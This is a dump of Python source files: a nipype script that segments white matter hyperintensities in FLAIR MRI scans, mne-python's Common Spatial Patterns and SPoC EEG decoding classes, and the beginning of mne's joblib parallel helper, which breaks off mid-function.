{
"source": "0rC0/WMHpypes",
"score": 2
}
#### File: WMHpypes/scripts/segment_wmh.py
```python
import sys, os
import argparse
import glob
#sys.path.append(os.path.abspath('../'))
from wmhpypes.workflows import ibbmTum_wf
from nipype.pipeline.engine import Workflow, Node
from nipype import DataSink, IdentityInterface
def make_workflow():
flairs = [os.path.abspath(i) for i in glob.glob(args.flair)]
weights = [os.path.abspath(i) for i in glob.glob(args.weights)]
weights_source = Node(interface=IdentityInterface(fields=['weights']), name='weights_source')
weights_source.inputs.weights = weights
data_source = Node(IdentityInterface(fields=['flairs']), name='data_source')
data_source.iterables = ('flairs', flairs)
    sink = Node(interface=DataSink(), name='sink')
    sink.inputs.base_directory = wmh_dir
    sink.inputs.substitutions = [('_flairs_', ''),
                                 ('_FLAIR.nii.gz/', '/')]
    sink.inputs.regexp_substitutions = [(r'\.\..*\.\.', '')]
test_wf = ibbmTum_wf.get_test_wf(row_st=192,
cols_st=192,
thres_mask=10)
wmh = Workflow(name='wmh', base_dir=wf_temp)
wmh.connect(weights_source, 'weights', test_wf, 'inputspec.weights')
wmh.connect(data_source, 'flairs', test_wf, 'inputspec.flair')
wmh.connect(test_wf, 'outputspec.wmh_mask', sink, '@pred')
return wmh
def make_dirs():
global wf_temp, wmh_dir
if not os.path.isdir(args.outdir):
os.makedirs(args.outdir)
wf_temp = os.path.abspath(os.path.join(args.outdir, 'wmh_temp'))
wmh_dir = os.path.abspath(os.path.join(args.outdir, 'wmh'))
if not os.path.isdir(wf_temp):
os.makedirs(wf_temp)
if not os.path.isdir(wmh_dir):
os.makedirs(wmh_dir)
def main():
print(os.getcwd())
make_dirs()
wmh = make_workflow()
#wmh.write_graph(graph2use='colored')
#Image('./wf_work_dir/wmh/graph.png', width=200)
wmh.run() #Single thread
#plugin_args = {'n_procs': cores}
#wmh.run(plugin='MultiProc', plugin_args=plugin_args)
if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Segment white matter hyperintensities (WMH) from FLAIR images.')
parser.add_argument('-f','--flair', type=str, required=True)
# parser.add_argument('-m','--mprage', type=str, required=False) # ToDo MPRage
parser.add_argument('-w','--weights', type=str, required=True)
parser.add_argument('-o','--outdir', type=str, required=True)
parser.add_argument('-i','--indir', type=str, required=False, default='')
args = parser.parse_args()
main()
```
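The script above is mostly plumbing around nipype's `Node`/`Workflow` API: an `IdentityInterface` node fans the input files out via `iterables`, and `Workflow.connect` wires named fields between nodes. A minimal sketch of that wiring pattern, assuming only that nipype is installed (the `double` function and the temp path are illustrative, not part of WMHpypes):

```python
from nipype import Node, Workflow, Function, IdentityInterface

def double(x):
    return x * 2

# fan a list of inputs out into one run per value, like data_source above
src = Node(IdentityInterface(fields=['x']), name='src')
src.iterables = ('x', [1, 2, 3])

dbl = Node(Function(input_names=['x'], output_names=['y'], function=double),
           name='dbl')

wf = Workflow(name='toy', base_dir='/tmp/toy_wf')  # illustrative base_dir
wf.connect(src, 'x', dbl, 'x')
wf.run()  # runs dbl once per iterable value
```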
{
"source": "0reza/mne-python",
"score": 3
}
#### File: mne/decoding/csp.py
```python
import copy as cp
import numpy as np
from .base import BaseEstimator
from .mixin import TransformerMixin
from ..cov import _regularized_covariance
from ..defaults import _INTERPOLATION_DEFAULT
from ..fixes import pinv
from ..utils import fill_doc, _check_option, _validate_type, copy_doc
@fill_doc
class CSP(TransformerMixin, BaseEstimator):
"""M/EEG signal decomposition using the Common Spatial Patterns (CSP).
This class can be used as a supervised decomposition to estimate spatial
filters for feature extraction. CSP in the context of EEG was first
described in :footcite:`KolesEtAl1990`; a comprehensive tutorial on CSP can
be found in :footcite:`BlankertzEtAl2008`. Multi-class solving is
implemented from :footcite:`Grosse-WentrupBuss2008`.
Parameters
----------
n_components : int (default 4)
The number of components to decompose M/EEG signals. This number should
be set by cross-validation.
reg : float | str | None (default None)
If not None (same as ``'empirical'``, default), allow regularization
for covariance estimation. If float (between 0 and 1), shrinkage is
used. For str values, ``reg`` will be passed as ``method`` to
:func:`mne.compute_covariance`.
log : None | bool (default None)
If ``transform_into`` equals ``'average_power'`` and ``log`` is None or
True, then apply a log transform to standardize features, else features
are z-scored. If ``transform_into`` is ``'csp_space'``, ``log`` must be
None.
cov_est : 'concat' | 'epoch' (default 'concat')
If ``'concat'``, covariance matrices are estimated on concatenated
epochs for each class. If ``'epoch'``, covariance matrices are
estimated on each epoch separately and then averaged over each class.
transform_into : 'average_power' | 'csp_space' (default 'average_power')
If 'average_power' then ``self.transform`` will return the average
power of each spatial filter. If ``'csp_space'``, ``self.transform``
will return the data in CSP space.
norm_trace : bool (default False)
Normalize class covariance by its trace. Trace normalization is a step
of the original CSP algorithm :footcite:`KolesEtAl1990` to eliminate
magnitude variations in the EEG between individuals. It is not applied
in more recent work :footcite:`BlankertzEtAl2008`,
:footcite:`Grosse-WentrupBuss2008` and can have a negative impact on
pattern order.
cov_method_params : dict | None
Parameters to pass to :func:`mne.compute_covariance`.
.. versionadded:: 0.16
%(rank_none)s
.. versionadded:: 0.17
component_order : 'mutual_info' | 'alternate' (default 'mutual_info')
If ``'mutual_info'`` order components by decreasing mutual information
(in the two-class case this uses a simplification which orders
components by decreasing absolute deviation of the eigenvalues from 0.5
:footcite:`BarachantEtAl2010`). For the two-class case, ``'alternate'``
orders components by starting with the largest eigenvalue, followed by
the smallest, the second-to-largest, the second-to-smallest, and so on
:footcite:`BlankertzEtAl2008`.
.. versionadded:: 0.21
Attributes
----------
filters_ : ndarray, shape (n_channels, n_channels)
If fit, the CSP components used to decompose the data, else None.
patterns_ : ndarray, shape (n_channels, n_channels)
If fit, the CSP patterns used to restore M/EEG signals, else None.
mean_ : ndarray, shape (n_components,)
If fit, the mean squared power for each component.
std_ : ndarray, shape (n_components,)
If fit, the std squared power for each component.
See Also
--------
mne.preprocessing.Xdawn, SPoC
References
----------
.. footbibliography::
"""
def __init__(self, n_components=4, reg=None, log=None, cov_est='concat',
transform_into='average_power', norm_trace=False,
cov_method_params=None, rank=None,
component_order='mutual_info'):
# Init default CSP
if not isinstance(n_components, int):
raise ValueError('n_components must be an integer.')
self.n_components = n_components
self.rank = rank
self.reg = reg
# Init default cov_est
if not (cov_est == "concat" or cov_est == "epoch"):
raise ValueError("unknown covariance estimation method")
self.cov_est = cov_est
# Init default transform_into
self.transform_into = _check_option('transform_into', transform_into,
['average_power', 'csp_space'])
# Init default log
if transform_into == 'average_power':
if log is not None and not isinstance(log, bool):
raise ValueError('log must be a boolean if transform_into == '
'"average_power".')
else:
            if log is not None:
                raise ValueError('log must be None if transform_into == '
                                 '"csp_space".')
self.log = log
_validate_type(norm_trace, bool, 'norm_trace')
self.norm_trace = norm_trace
self.cov_method_params = cov_method_params
self.component_order = _check_option('component_order',
component_order,
('mutual_info', 'alternate'))
def _check_Xy(self, X, y=None):
"""Check input data."""
if not isinstance(X, np.ndarray):
raise ValueError("X should be of type ndarray (got %s)."
% type(X))
if y is not None:
if len(X) != len(y) or len(y) < 1:
raise ValueError('X and y must have the same length.')
if X.ndim < 3:
raise ValueError('X must have at least 3 dimensions.')
def fit(self, X, y):
"""Estimate the CSP decomposition on epochs.
Parameters
----------
X : ndarray, shape (n_epochs, n_channels, n_times)
The data on which to estimate the CSP.
y : array, shape (n_epochs,)
The class for each epoch.
Returns
-------
self : instance of CSP
Returns the modified instance.
"""
self._check_Xy(X, y)
self._classes = np.unique(y)
n_classes = len(self._classes)
if n_classes < 2:
raise ValueError("n_classes must be >= 2.")
if n_classes > 2 and self.component_order == 'alternate':
raise ValueError("component_order='alternate' requires two "
"classes, but data contains {} classes; use "
"component_order='mutual_info' "
"instead.".format(n_classes))
covs, sample_weights = self._compute_covariance_matrices(X, y)
eigen_vectors, eigen_values = self._decompose_covs(covs,
sample_weights)
ix = self._order_components(covs, sample_weights, eigen_vectors,
eigen_values, self.component_order)
eigen_vectors = eigen_vectors[:, ix]
self.filters_ = eigen_vectors.T
self.patterns_ = pinv(eigen_vectors)
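        # Rows of filters_ unmix the data into CSP components; patterns_,
        # the pseudoinverse of the eigenvector matrix, is the corresponding
        # forward model (how each component projects back onto the sensors).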
pick_filters = self.filters_[:self.n_components]
X = np.asarray([np.dot(pick_filters, epoch) for epoch in X])
# compute features (mean power)
X = (X ** 2).mean(axis=2)
# To standardize features
self.mean_ = X.mean(axis=0)
self.std_ = X.std(axis=0)
return self
def transform(self, X):
"""Estimate epochs sources given the CSP filters.
Parameters
----------
X : array, shape (n_epochs, n_channels, n_times)
The data.
Returns
-------
        X : ndarray
            If ``transform_into == 'average_power'``, the power of the CSP
            features averaged over time, with shape (n_epochs, n_sources).
            If ``transform_into == 'csp_space'``, the data in CSP space,
            with shape (n_epochs, n_sources, n_times).
"""
if not isinstance(X, np.ndarray):
raise ValueError("X should be of type ndarray (got %s)." % type(X))
if self.filters_ is None:
raise RuntimeError('No filters available. Please first fit CSP '
'decomposition.')
pick_filters = self.filters_[:self.n_components]
X = np.asarray([np.dot(pick_filters, epoch) for epoch in X])
# compute features (mean band power)
if self.transform_into == 'average_power':
X = (X ** 2).mean(axis=2)
log = True if self.log is None else self.log
if log:
X = np.log(X)
else:
X -= self.mean_
X /= self.std_
return X
@copy_doc(TransformerMixin.fit_transform)
def fit_transform(self, X, y, **fit_params): # noqa: D102
return super().fit_transform(X, y=y, **fit_params)
@fill_doc
def plot_patterns(self, info, components=None, ch_type=None,
vmin=None, vmax=None, cmap='RdBu_r', sensors=True,
colorbar=True, scalings=None, units='a.u.', res=64,
size=1, cbar_fmt='%3.1f', name_format='CSP%01d',
show=True, show_names=False, title=None, mask=None,
mask_params=None, outlines='head', contours=6,
image_interp=_INTERPOLATION_DEFAULT, average=None,
sphere=None):
"""Plot topographic patterns of components.
The patterns explain how the measured data was generated from the
neural sources (a.k.a. the forward model).
Parameters
----------
%(info_not_none)s Used for fitting. If not available, consider using
:func:`mne.create_info`.
components : float | array of float | None
The patterns to plot. If None, n_components will be shown.
ch_type : 'mag' | 'grad' | 'planar1' | 'planar2' | 'eeg' | None
The channel type to plot. For 'grad', the gradiometers are
collected in pairs and the RMS for each pair is plotted.
If None, then first available channel type from order given
above is used. Defaults to None.
vmin : float | callable
The value specifying the lower bound of the color range.
If None, and vmax is None, -vmax is used. Else np.min(data).
If callable, the output equals vmin(data).
vmax : float | callable
The value specifying the upper bound of the color range.
If None, the maximum absolute value is used. If vmin is None,
            but vmax is not, defaults to np.min(data).
If callable, the output equals vmax(data).
cmap : matplotlib colormap | (colormap, bool) | 'interactive' | None
Colormap to use. If tuple, the first value indicates the colormap
to use and the second value is a boolean defining interactivity. In
interactive mode the colors are adjustable by clicking and dragging
the colorbar with left and right mouse button. Left mouse button
moves the scale up and down and right mouse button adjusts the
range. Hitting space bar resets the range. Up and down arrows can
be used to change the colormap. If None, 'Reds' is used for all
positive data, otherwise defaults to 'RdBu_r'. If 'interactive',
translates to (None, True). Defaults to 'RdBu_r'.
.. warning:: Interactive mode works smoothly only for a small
amount of topomaps.
sensors : bool | str
Add markers for sensor locations to the plot. Accepts matplotlib
plot format string (e.g., 'r+' for red plusses). If True,
a circle will be used (via .add_artist). Defaults to True.
colorbar : bool
Plot a colorbar.
scalings : dict | float | None
The scalings of the channel types to be applied for plotting.
If None, defaults to ``dict(eeg=1e6, grad=1e13, mag=1e15)``.
units : dict | str | None
The unit of the channel type used for colorbar label. If
scale is None the unit is automatically determined.
res : int
The resolution of the topomap image (n pixels along each side).
size : float
Side length per topomap in inches.
cbar_fmt : str
String format for colorbar values.
name_format : str
String format for topomap values. Defaults to "CSP%%01d".
show : bool
Show figure if True.
show_names : bool | callable
If True, show channel names on top of the map. If a callable is
passed, channel names will be formatted using the callable; e.g.,
to delete the prefix 'MEG ' from all channel names, pass the
function lambda x: x.replace('MEG ', ''). If ``mask`` is not None,
only significant sensors will be shown.
title : str | None
Title. If None (default), no title is displayed.
%(mask_patterns_topomap)s
%(mask_params_topomap)s
%(outlines_topomap)s
contours : int | array of float
The number of contour lines to draw. If 0, no contours will be
drawn. When an integer, matplotlib ticker locator is used to find
suitable values for the contour thresholds (may sometimes be
inaccurate, use array for accuracy). If an array, the values
represent the levels for the contours. Defaults to 6.
%(image_interp_topomap)s
average : float | None
The time window around a given time to be used for averaging
(seconds). For example, 0.01 would translate into window that
starts 5 ms before and ends 5 ms after a given time point.
Defaults to None, which means no averaging.
%(sphere_topomap_auto)s
Returns
-------
fig : instance of matplotlib.figure.Figure
The figure.
"""
from .. import EvokedArray
if components is None:
components = np.arange(self.n_components)
# set sampling frequency to have 1 component per time point
info = cp.deepcopy(info)
with info._unlock():
info['sfreq'] = 1.
# create an evoked
patterns = EvokedArray(self.patterns_.T, info, tmin=0)
        # then call plot_topomap
return patterns.plot_topomap(
times=components, ch_type=ch_type,
vmin=vmin, vmax=vmax, cmap=cmap, colorbar=colorbar, res=res,
cbar_fmt=cbar_fmt, sensors=sensors,
scalings=scalings, units=units, time_unit='s',
time_format=name_format, size=size, show_names=show_names,
title=title, mask_params=mask_params, mask=mask, outlines=outlines,
contours=contours, image_interp=image_interp, show=show,
average=average, sphere=sphere)
@fill_doc
def plot_filters(self, info, components=None, ch_type=None,
vmin=None, vmax=None, cmap='RdBu_r', sensors=True,
colorbar=True, scalings=None, units='a.u.', res=64,
size=1, cbar_fmt='%3.1f', name_format='CSP%01d',
show=True, show_names=False, title=None, mask=None,
mask_params=None, outlines='head', contours=6,
image_interp=_INTERPOLATION_DEFAULT, average=None):
"""Plot topographic filters of components.
The filters are used to extract discriminant neural sources from
the measured data (a.k.a. the backward model).
Parameters
----------
%(info_not_none)s Used for fitting. If not available, consider using
:func:`mne.create_info`.
        components : float | array of float | None
            The filters to plot. If None, ``n_components`` will be shown.
ch_type : 'mag' | 'grad' | 'planar1' | 'planar2' | 'eeg' | None
The channel type to plot. For 'grad', the gradiometers are
collected in pairs and the RMS for each pair is plotted.
If None, then first available channel type from order given
above is used. Defaults to None.
vmin : float | callable
The value specifying the lower bound of the color range.
If None, and vmax is None, -vmax is used. Else np.min(data).
If callable, the output equals vmin(data).
vmax : float | callable
The value specifying the upper bound of the color range.
If None, the maximum absolute value is used. If vmin is None,
but vmax is not, defaults to np.min(data).
If callable, the output equals vmax(data).
cmap : matplotlib colormap | (colormap, bool) | 'interactive' | None
Colormap to use. If tuple, the first value indicates the colormap
to use and the second value is a boolean defining interactivity. In
interactive mode the colors are adjustable by clicking and dragging
the colorbar with left and right mouse button. Left mouse button
moves the scale up and down and right mouse button adjusts the
range. Hitting space bar resets the range. Up and down arrows can
be used to change the colormap. If None, 'Reds' is used for all
positive data, otherwise defaults to 'RdBu_r'. If 'interactive',
translates to (None, True). Defaults to 'RdBu_r'.
.. warning:: Interactive mode works smoothly only for a small
amount of topomaps.
sensors : bool | str
Add markers for sensor locations to the plot. Accepts matplotlib
plot format string (e.g., 'r+' for red plusses). If True,
a circle will be used (via .add_artist). Defaults to True.
colorbar : bool
Plot a colorbar.
scalings : dict | float | None
The scalings of the channel types to be applied for plotting.
If None, defaults to ``dict(eeg=1e6, grad=1e13, mag=1e15)``.
units : dict | str | None
The unit of the channel type used for colorbar label. If
scale is None the unit is automatically determined.
res : int
The resolution of the topomap image (n pixels along each side).
size : float
Side length per topomap in inches.
cbar_fmt : str
String format for colorbar values.
name_format : str
String format for topomap values. Defaults to "CSP%%01d".
show : bool
Show figure if True.
show_names : bool | callable
If True, show channel names on top of the map. If a callable is
passed, channel names will be formatted using the callable; e.g.,
to delete the prefix 'MEG ' from all channel names, pass the
function lambda x: x.replace('MEG ', ''). If ``mask`` is not None,
only significant sensors will be shown.
title : str | None
Title. If None (default), no title is displayed.
mask : ndarray of bool, shape (n_channels, n_times) | None
The channels to be marked as significant at a given time point.
Indices set to `True` will be considered. Defaults to None.
mask_params : dict | None
Additional plotting parameters for plotting significant sensors.
Default (None) equals::
dict(marker='o', markerfacecolor='w', markeredgecolor='k',
linewidth=0, markersize=4)
%(outlines_topomap)s
contours : int | array of float
The number of contour lines to draw. If 0, no contours will be
drawn. When an integer, matplotlib ticker locator is used to find
suitable values for the contour thresholds (may sometimes be
inaccurate, use array for accuracy). If an array, the values
represent the levels for the contours. Defaults to 6.
%(image_interp_topomap)s
average : float | None
The time window around a given time to be used for averaging
(seconds). For example, 0.01 would translate into window that
starts 5 ms before and ends 5 ms after a given time point.
Defaults to None, which means no averaging.
Returns
-------
fig : instance of matplotlib.figure.Figure
The figure.
"""
from .. import EvokedArray
if components is None:
components = np.arange(self.n_components)
# set sampling frequency to have 1 component per time point
info = cp.deepcopy(info)
with info._unlock():
info['sfreq'] = 1.
# create an evoked
filters = EvokedArray(self.filters_.T, info, tmin=0)
        # then call plot_topomap
return filters.plot_topomap(
times=components, ch_type=ch_type, vmin=vmin,
vmax=vmax, cmap=cmap, colorbar=colorbar, res=res,
cbar_fmt=cbar_fmt, sensors=sensors, scalings=scalings, units=units,
time_unit='s', time_format=name_format, size=size,
show_names=show_names, title=title, mask_params=mask_params,
mask=mask, outlines=outlines, contours=contours,
image_interp=image_interp, show=show, average=average)
def _compute_covariance_matrices(self, X, y):
_, n_channels, _ = X.shape
if self.cov_est == "concat":
cov_estimator = self._concat_cov
elif self.cov_est == "epoch":
cov_estimator = self._epoch_cov
covs = []
sample_weights = []
for this_class in self._classes:
cov, weight = cov_estimator(X[y == this_class])
if self.norm_trace:
cov /= np.trace(cov)
covs.append(cov)
sample_weights.append(weight)
return np.stack(covs), np.array(sample_weights)
def _concat_cov(self, x_class):
"""Concatenate epochs before computing the covariance."""
_, n_channels, _ = x_class.shape
x_class = np.transpose(x_class, [1, 0, 2])
x_class = x_class.reshape(n_channels, -1)
cov = _regularized_covariance(
x_class, reg=self.reg, method_params=self.cov_method_params,
rank=self.rank)
weight = x_class.shape[0]
return cov, weight
def _epoch_cov(self, x_class):
"""Mean of per-epoch covariances."""
cov = sum(_regularized_covariance(
this_X, reg=self.reg,
method_params=self.cov_method_params,
rank=self.rank) for this_X in x_class)
cov /= len(x_class)
weight = len(x_class)
return cov, weight
def _decompose_covs(self, covs, sample_weights):
from scipy import linalg
n_classes = len(covs)
if n_classes == 2:
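            # Two-class CSP reduces to the generalized eigenproblem
            # covs[0] @ w = lam * (covs[0] + covs[1]) @ w: lam is the share
            # of class-0 power captured by w, so lam near 0 or 1 is
            # discriminative while lam == 0.5 carries no class information.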
eigen_values, eigen_vectors = linalg.eigh(covs[0], covs.sum(0))
else:
# The multiclass case is adapted from
# http://github.com/alexandrebarachant/pyRiemann
eigen_vectors, D = _ajd_pham(covs)
eigen_vectors = self._normalize_eigenvectors(eigen_vectors.T, covs,
sample_weights)
eigen_values = None
return eigen_vectors, eigen_values
def _compute_mutual_info(self, covs, sample_weights, eigen_vectors):
class_probas = sample_weights / sample_weights.sum()
mutual_info = []
for jj in range(eigen_vectors.shape[1]):
aa, bb = 0, 0
for (cov, prob) in zip(covs, class_probas):
tmp = np.dot(np.dot(eigen_vectors[:, jj].T, cov),
eigen_vectors[:, jj])
aa += prob * np.log(np.sqrt(tmp))
bb += prob * (tmp ** 2 - 1)
mi = - (aa + (3.0 / 16) * (bb ** 2))
mutual_info.append(mi)
return mutual_info
def _normalize_eigenvectors(self, eigen_vectors, covs, sample_weights):
        # Here we apply a Euclidean mean; see pyRiemann for other metrics.
mean_cov = np.average(covs, axis=0, weights=sample_weights)
for ii in range(eigen_vectors.shape[1]):
tmp = np.dot(np.dot(eigen_vectors[:, ii].T, mean_cov),
eigen_vectors[:, ii])
eigen_vectors[:, ii] /= np.sqrt(tmp)
return eigen_vectors
def _order_components(self, covs, sample_weights, eigen_vectors,
eigen_values, component_order):
n_classes = len(self._classes)
if component_order == 'mutual_info' and n_classes > 2:
mutual_info = self._compute_mutual_info(covs, sample_weights,
eigen_vectors)
ix = np.argsort(mutual_info)[::-1]
elif component_order == 'mutual_info' and n_classes == 2:
ix = np.argsort(np.abs(eigen_values - 0.5))[::-1]
elif component_order == 'alternate' and n_classes == 2:
i = np.argsort(eigen_values)
ix = np.empty_like(i)
ix[1::2] = i[:len(i) // 2]
ix[0::2] = i[len(i) // 2:][::-1]
return ix
def _ajd_pham(X, eps=1e-6, max_iter=15):
"""Approximate joint diagonalization based on Pham's algorithm.
This is a direct implementation of the PHAM's AJD algorithm [1].
Parameters
----------
X : ndarray, shape (n_epochs, n_channels, n_channels)
A set of covariance matrices to diagonalize.
    eps : float, default 1e-6
        The tolerance for the stopping criterion.
    max_iter : int, default 15
        The maximum number of iterations used to reach convergence.
Returns
-------
V : ndarray, shape (n_channels, n_channels)
The diagonalizer.
D : ndarray, shape (n_epochs, n_channels, n_channels)
The set of quasi diagonal matrices.
References
----------
    .. [1] Pham, Dinh Tuan. "Joint approximate diagonalization of positive
       definite Hermitian matrices." SIAM Journal on Matrix Analysis and
       Applications 22, no. 4 (2001): 1136-1152.
"""
# Adapted from http://github.com/alexandrebarachant/pyRiemann
n_epochs = X.shape[0]
# Reshape input matrix
A = np.concatenate(X, axis=0).T
# Init variables
n_times, n_m = A.shape
V = np.eye(n_times)
epsilon = n_times * (n_times - 1) * eps
for it in range(max_iter):
decr = 0
for ii in range(1, n_times):
for jj in range(ii):
Ii = np.arange(ii, n_m, n_times)
Ij = np.arange(jj, n_m, n_times)
c1 = A[ii, Ii]
c2 = A[jj, Ij]
g12 = np.mean(A[ii, Ij] / c1)
g21 = np.mean(A[ii, Ij] / c2)
omega21 = np.mean(c1 / c2)
omega12 = np.mean(c2 / c1)
omega = np.sqrt(omega12 * omega21)
tmp = np.sqrt(omega21 / omega12)
tmp1 = (tmp * g12 + g21) / (omega + 1)
tmp2 = (tmp * g12 - g21) / max(omega - 1, 1e-9)
h12 = tmp1 + tmp2
h21 = np.conj((tmp1 - tmp2) / tmp)
decr += n_epochs * (g12 * np.conj(h12) + g21 * h21) / 2.0
tmp = 1 + 1.j * 0.5 * np.imag(h12 * h21)
tmp = np.real(tmp + np.sqrt(tmp ** 2 - h12 * h21))
tau = np.array([[1, -h12 / tmp], [-h21 / tmp, 1]])
A[[ii, jj], :] = np.dot(tau, A[[ii, jj], :])
tmp = np.c_[A[:, Ii], A[:, Ij]]
tmp = np.reshape(tmp, (n_times * n_epochs, 2), order='F')
tmp = np.dot(tmp, tau.T)
tmp = np.reshape(tmp, (n_times, n_epochs * 2), order='F')
A[:, Ii] = tmp[:, :n_epochs]
A[:, Ij] = tmp[:, n_epochs:]
V[[ii, jj], :] = np.dot(tau, V[[ii, jj], :])
if decr < epsilon:
break
D = np.reshape(A, (n_times, -1, n_times)).transpose(1, 0, 2)
return V, D
@fill_doc
class SPoC(CSP):
"""Implementation of the SPoC spatial filtering.
    Source Power Comodulation (SPoC) :footcite:`DahneEtAl2014` extracts
    spatial filters and patterns by using a target (continuous) variable in
    the decomposition process, giving preference to components whose power
    correlates with the target variable.
SPoC can be seen as an extension of the CSP driven by a continuous
variable rather than a discrete variable. Typical applications include
extraction of motor patterns using EMG power or audio patterns using sound
envelope.
Parameters
----------
n_components : int
The number of components to decompose M/EEG signals.
reg : float | str | None (default None)
If not None (same as ``'empirical'``, default), allow
regularization for covariance estimation.
If float, shrinkage is used (0 <= shrinkage <= 1).
        For str options, ``reg`` will be passed as ``method`` to
        :func:`mne.compute_covariance`.
log : None | bool (default None)
If transform_into == 'average_power' and log is None or True, then
applies a log transform to standardize the features, else the features
are z-scored. If transform_into == 'csp_space', then log must be None.
transform_into : {'average_power', 'csp_space'}
If 'average_power' then self.transform will return the average power of
each spatial filter. If 'csp_space' self.transform will return the data
in CSP space. Defaults to 'average_power'.
cov_method_params : dict | None
Parameters to pass to :func:`mne.compute_covariance`.
.. versionadded:: 0.16
%(rank_none)s
.. versionadded:: 0.17
Attributes
----------
filters_ : ndarray, shape (n_channels, n_channels)
If fit, the SPoC spatial filters, else None.
patterns_ : ndarray, shape (n_channels, n_channels)
If fit, the SPoC spatial patterns, else None.
mean_ : ndarray, shape (n_components,)
If fit, the mean squared power for each component.
std_ : ndarray, shape (n_components,)
If fit, the std squared power for each component.
See Also
--------
mne.preprocessing.Xdawn, CSP
References
----------
.. footbibliography::
"""
def __init__(self, n_components=4, reg=None, log=None,
transform_into='average_power', cov_method_params=None,
rank=None):
"""Init of SPoC."""
super(SPoC, self).__init__(n_components=n_components, reg=reg, log=log,
cov_est="epoch", norm_trace=False,
transform_into=transform_into, rank=rank,
cov_method_params=cov_method_params)
        # Covariance estimation has to be done on the single-epoch level,
        # unlike CSP, where covariance estimation can also be achieved
        # through concatenation of all epochs from the same class.
delattr(self, 'cov_est')
delattr(self, 'norm_trace')
def fit(self, X, y):
"""Estimate the SPoC decomposition on epochs.
Parameters
----------
X : ndarray, shape (n_epochs, n_channels, n_times)
The data on which to estimate the SPoC.
y : array, shape (n_epochs,)
The class for each epoch.
Returns
-------
self : instance of SPoC
Returns the modified instance.
"""
from scipy import linalg
self._check_Xy(X, y)
if len(np.unique(y)) < 2:
raise ValueError("y must have at least two distinct values.")
# The following code is directly copied from pyRiemann
# Normalize target variable
target = y.astype(np.float64)
target -= target.mean()
target /= target.std()
n_epochs, n_channels = X.shape[:2]
# Estimate single trial covariance
covs = np.empty((n_epochs, n_channels, n_channels))
for ii, epoch in enumerate(X):
covs[ii] = _regularized_covariance(
epoch, reg=self.reg, method_params=self.cov_method_params,
rank=self.rank)
C = covs.mean(0)
Cz = np.mean(covs * target[:, np.newaxis, np.newaxis], axis=0)
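        # C is the grand-average covariance, Cz the target-weighted one;
        # eigh(Cz, C) below yields filters whose output power covaries
        # maximally (largest |eigenvalue|) with the z-scored target.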
# solve eigenvalue decomposition
evals, evecs = linalg.eigh(Cz, C)
evals = evals.real
evecs = evecs.real
# sort vectors
ix = np.argsort(np.abs(evals))[::-1]
# sort eigenvectors
evecs = evecs[:, ix].T
# spatial patterns
self.patterns_ = linalg.pinv(evecs).T # n_channels x n_channels
self.filters_ = evecs # n_channels x n_channels
pick_filters = self.filters_[:self.n_components]
X = np.asarray([np.dot(pick_filters, epoch) for epoch in X])
# compute features (mean band power)
X = (X ** 2).mean(axis=-1)
# To standardize features
self.mean_ = X.mean(axis=0)
self.std_ = X.std(axis=0)
return self
def transform(self, X):
"""Estimate epochs sources given the SPoC filters.
Parameters
----------
X : array, shape (n_epochs, n_channels, n_times)
The data.
Returns
-------
        X : ndarray
            If ``transform_into == 'average_power'``, the power of the CSP
            features averaged over time, with shape (n_epochs, n_sources).
            If ``transform_into == 'csp_space'``, the data in CSP space,
            with shape (n_epochs, n_sources, n_times).
"""
return super(SPoC, self).transform(X)
```
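For orientation, a hedged usage sketch of the `CSP` estimator above on synthetic data (the random arrays only demonstrate the expected shapes; `'ledoit_wolf'` is one of the covariance methods accepted through ``reg``):

```python
import numpy as np
from mne.decoding import CSP

rng = np.random.default_rng(0)
X = rng.standard_normal((40, 8, 200))  # 40 epochs, 8 channels, 200 samples
y = np.repeat([0, 1], 20)              # two balanced classes

csp = CSP(n_components=4, reg='ledoit_wolf')
features = csp.fit_transform(X, y)     # (40, 4): log-power features
X_csp = CSP(n_components=4, transform_into='csp_space').fit(X, y).transform(X)
print(features.shape, X_csp.shape)     # (40, 4) (40, 4, 200)
```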
#### File: mne-python/mne/parallel.py
```python
import logging
import multiprocessing
import os
from . import get_config
from .utils import (logger, verbose, warn, ProgressBar, _validate_type,
_check_option, _ensure_int, deprecated)
@verbose
def parallel_func(func, n_jobs, max_nbytes='auto', pre_dispatch='n_jobs',
total=None, prefer=None, *, max_jobs=None, verbose=None):
"""Return parallel instance with delayed function.
    Utility function that uses joblib only if it is available.
Parameters
----------
func : callable
A function.
%(n_jobs)s
max_nbytes : int, str, or None
Threshold on the minimum size of arrays passed to the workers that
triggers automated memory mapping. Can be an int in Bytes,
or a human-readable string, e.g., '1M' for 1 megabyte.
        Use None to disable memmapping of large arrays. Use 'auto' to
use the value set using mne.set_memmap_min_size.
pre_dispatch : int, or str, optional
See :class:`joblib.Parallel`.
total : int | None
If int, use a progress bar to display the progress of dispatched
jobs. This should only be used when directly iterating, not when
using ``split_list`` or :func:`np.array_split`.
If None (default), do not add a progress bar.
prefer : str | None
If str, can be "processes" or "threads". See :class:`joblib.Parallel`.
.. versionadded:: 0.18
    max_jobs : int | None
        The upper limit of jobs to use. This is useful when you know ahead
        of time the maximum number of calls into :class:`joblib.Parallel`
        that you could possibly want or need, and the returned ``n_jobs``
        should not exceed this value regardless of how many jobs the user
        requests.
%(verbose)s INFO or DEBUG
will print parallel status, others will not.
Returns
-------
parallel: instance of joblib.Parallel or list
The parallel object.
my_func: callable
``func`` if not parallel or delayed(func).
n_jobs: int
Number of jobs >= 1.
"""
should_print = (logger.level <= logging.INFO)
# for a single job, we don't need joblib
_validate_type(n_jobs, ('int-like', None))
if n_jobs != 1:
try:
from joblib import Parallel, delayed
except ImportError:
if n_jobs is not None:
warn('joblib not installed. Cannot run in parallel.')
n_jobs = 1
if n_jobs == 1:
n_jobs = 1
my_func = func
parallel = list
else:
        # check if joblib is recent enough to support memmapping
cache_dir = get_config('MNE_CACHE_DIR', None)
if isinstance(max_nbytes, str) and max_nbytes == 'auto':
max_nbytes = get_config('MNE_MEMMAP_MIN_SIZE', None)
if max_nbytes is not None and cache_dir is None:
logger.info(
                'joblib supports memmapping pool but "MNE_CACHE_DIR" '
'is not set in MNE-Python config. To enable it, use, '
'e.g., mne.set_cache_dir(\'/tmp/shm\'). This will '
'store temporary files under /dev/shm and can result '
'in large memory savings.')
# create keyword arguments for Parallel
kwargs = {'verbose': 5 if should_print and total is None else 0}
kwargs['pre_dispatch'] = pre_dispatch
kwargs['prefer'] = prefer
if cache_dir is None:
max_nbytes = None # disable memmaping
kwargs['temp_folder'] = cache_dir
kwargs['max_nbytes'] = max_nbytes
parallel = Parallel(n_jobs, **kwargs)
